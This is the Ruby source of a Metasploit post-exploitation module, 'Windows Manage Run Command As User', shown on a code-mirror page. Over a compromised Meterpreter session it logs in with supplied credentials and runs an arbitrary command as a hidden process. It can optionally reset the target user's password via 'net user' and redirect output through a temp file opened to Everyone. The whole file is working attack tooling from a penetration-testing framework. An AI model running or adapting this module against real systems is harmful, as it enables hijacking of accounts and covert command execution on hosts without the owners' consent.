Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/run_as.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::Priv

9
  include Msf::Post::Windows::Runas

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Manage Run Command As User',

16
        'Description' => %q{

17
          This module will login with the specified username/password and execute the

18
          supplied command as a hidden process. Output is not returned by default, by setting

19
          CMDOUT to true output will be redirected to a temp file and read back in to

20
          display. By setting advanced option SETPASS to true, it will reset the user's

21
          password and then execute the command.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Platform' => ['win'],

25
        'SessionTypes' => ['meterpreter'],

26
        'Author' => ['Kx499'],

27
        'Compat' => {

28
          'Meterpreter' => {

29
            'Commands' => %w[

30
              stdapi_railgun_api

31
              stdapi_sys_config_getprivs

32
            ]

33
          }

34
        },

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        OptString.new('DOMAIN', [true, 'Domain to login with' ]),

46
        OptString.new('USER', [true, 'Username to login with' ]),

47
        OptString.new('PASSWORD', [true, 'Password to login with' ]),

48
        OptString.new('CMD', [true, 'Command to execute' ]),

49
        OptBool.new('CMDOUT', [true, 'Retrieve command output', false])

50
      ]

51
    )

52


53
    register_advanced_options(

54
      [

55
        OptBool.new('SETPASS', [true, 'Reset password', false])

56
      ]

57
    )

58
  end

59


60
  # Check if sufficient privileges are present for certain actions and run getprivs for system

61
  # If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You

62
  # need to migrate to a process that is running as

63
  # system. If you don't have privs, this exits script.

64
  def priv_check

65
    if is_system?

66
      privs = session.sys.config.getprivs

67
      return privs.include?('SeAssignPrimaryTokenPrivilege') && privs.include?('SeIncreaseQuotaPrivilege')

68
    end

69


70
    false

71
  end

72


73
  def reset_pass(user, password)

74
    tmpout = cmd_exec("cmd.exe /c net user #{user} #{password}")

75
    return tmpout.include?('successfully')

76
  rescue StandardError

77
    return false

78
  end

79


80
  def touch(path)

81
    write_file(path, '')

82
    cmd_exec("icacls #{path} /grant Everyone:(F)")

83
  end

84


85
  def run

86
    # Make sure we meet the requirements before running the script, note no need to return

87
    # unless error

88
    return unless session.type == 'meterpreter'

89


90
    pi = nil

91
    # check/set vars

92
    setpass = datastore['SETPASS']

93
    cmdout = datastore['CMDOUT']

94
    user = datastore['USER'] || nil

95
    password = datastore['PASSWORD'] || nil

96
    cmd = datastore['CMD'] || nil

97
    domain = datastore['DOMAIN']

98


99
    if setpass

100
      print_status('Setting user password')

101
      fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)

102
    end

103


104
    # If command output is requested, then create output file and set open permissions

105
    if cmdout

106
      system_temp = get_env('WINDIR') << '\\Temp'

107
      outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"

108
      touch(outpath)

109
      cmdstr = "cmd.exe /c #{cmd} > #{outpath}"

110
    else

111
      cmdstr = "cmd.exe /c #{cmd}"

112
    end

113


114
    # Check privs and execute the correct commands

115
    # if user use createprocesswithlogon, if system logonuser and createprocessasuser

116
    # execute command and get output with a poor mans pipe

117
    if priv_check

118
      print_status('Executing CreateProcessAsUserA...we are SYSTEM')

119
      pi = create_process_as_user(domain, user, password, nil, cmdstr)

120
      if pi

121
        session.railgun.kernel32.CloseHandle(pi[:process_handle])

122
        session.railgun.kernel32.CloseHandle(pi[:thread_handle])

123
      end

124
    else

125
      print_status('Executing CreateProcessWithLogonW...')

126
      pi = create_process_with_logon(domain, user, password, nil, cmdstr)

127
    end

128


129
    # Only process file if the process creation was successful, delete when done, give us info

130
    # about process

131
    if pi

132
      tmpout = read_file(outpath) if cmdout

133


134
      print_status("Command Run: #{cmdstr}")

135
      vprint_status("Process Handle: #{pi[:process_handle]}")

136
      vprint_status("Thread Handle: #{pi[:thread_handle]}")

137
      vprint_status("Process Id: #{pi[:process_id]}")

138
      vprint_status("Thread Id: #{pi[:thread_id]}")

139
      print_status("Command output:\r\n#{tmpout}") if cmdout

140
    end

141


142
    if cmdout

143
      print_status("Removing temp file #{outpath}")

144
      rm_f(outpath)

145
    end

146
  end

147
end

148


149